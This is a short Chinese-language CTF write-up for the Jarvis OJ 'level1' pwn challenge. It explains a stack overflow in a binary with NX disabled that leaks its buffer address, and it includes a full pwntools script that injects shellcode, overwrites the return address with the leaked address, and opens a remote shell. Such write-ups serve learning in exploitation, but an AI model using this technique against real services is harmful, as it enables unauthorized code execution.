题目信息
nc pwn2.jarvisoj.com 9877
level1.80eacdcd51aca92af7749d96efad7fb5
没开NX
静态分析
IDA F5一把梭
img
流程很简单,明显的溢出,并且打印出了buf的地址
那么就可以直接将shellcode写到已知地址的buf中,并且通过溢出将返回地址修改为buf执行shellcode
简单示意图,图源自网络
img
exploit
img
offset = 140 = 0x88 +4,因为有一个old_ebp,之后才是返回地址
构造exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
| from pwn import *
elf = ELF('./level1')
sh = remote('pwn2.jarvisoj.com', 9877) # sh = process('./level1') context.arch = 'i386' context.log_level = 'debug'
buf_addr = sh.recv()[12:22] buf_addr = p32(int(buf_addr, 16))
shellcode = asm(shellcraft.sh()) payload = shellcode.ljust(0x88, 'A') payload += 'BBBB' payload += buf_addr
sh.sendline(payload) sh.interactive()
|
getflag
Last updated:
水平不济整日被虐这也不会那也得学,脑子太蠢天天垫底这看不懂那学不会